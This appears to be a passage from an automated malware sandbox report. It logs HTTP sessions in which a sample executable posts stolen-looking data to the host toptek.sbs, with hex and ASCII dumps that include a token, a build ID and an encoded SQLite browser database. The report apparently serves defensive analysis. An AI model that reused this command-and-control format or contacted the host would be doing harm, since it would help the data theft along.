                                                                                                                                                                                                                                                            2024-12-21 21:17:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:27 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:29 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-21 21:17:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            35192.168.2.44987194.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:28 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----W4WB1DBIMOZMYMGVKXL6
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 493
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:28 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 57 34 57 42 31 44 42 49 4d 4f 5a 4d 59 4d 47 56 4b 58 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 57 34 57 42 31 44 42 49 4d 4f 5a 4d 59 4d 47 56 4b 58 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 57 34 57 42 31 44 42 49 4d 4f 5a 4d 59 4d 47 56 4b 58 4c 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------W4WB1DBIMOZMYMGVKXL6Content-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------W4WB1DBIMOZMYMGVKXL6Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------W4WB1DBIMOZMYMGVKXL6Cont
                                                                                                                                                                                                                                                            2024-12-21 21:17:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:29 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-21 21:17:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            36192.168.2.44987594.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CJMY5FC2NGVAIM790ZUS
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 169765
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 4a 4d 59 35 46 43 32 4e 47 56 41 49 4d 37 39 30 5a 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 4d 59 35 46 43 32 4e 47 56 41 49 4d 37 39 30 5a 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 4d 59 35 46 43 32 4e 47 56 41 49 4d 37 39 30 5a 55 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------CJMY5FC2NGVAIM790ZUSContent-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------CJMY5FC2NGVAIM790ZUSContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------CJMY5FC2NGVAIM790ZUSCont
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                                                                                                            Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                                                                                                                                                                                            2024-12-21 21:17:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:33 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            37192.168.2.44987694.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:32 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----UAS0ZM7Y5XBAIMOHVKX4
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 66001
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:32 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 4d 37 59 35 58 42 41 49 4d 4f 48 56 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 4d 37 59 35 58 42 41 49 4d 4f 48 56 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 4d 37 59 35 58 42 41 49 4d 4f 48 56 4b 58 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------UAS0ZM7Y5XBAIMOHVKX4Content-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------UAS0ZM7Y5XBAIMOHVKX4Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------UAS0ZM7Y5XBAIMOHVKX4Cont
                                                                                                                                                                                                                                                            2024-12-21 21:17:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
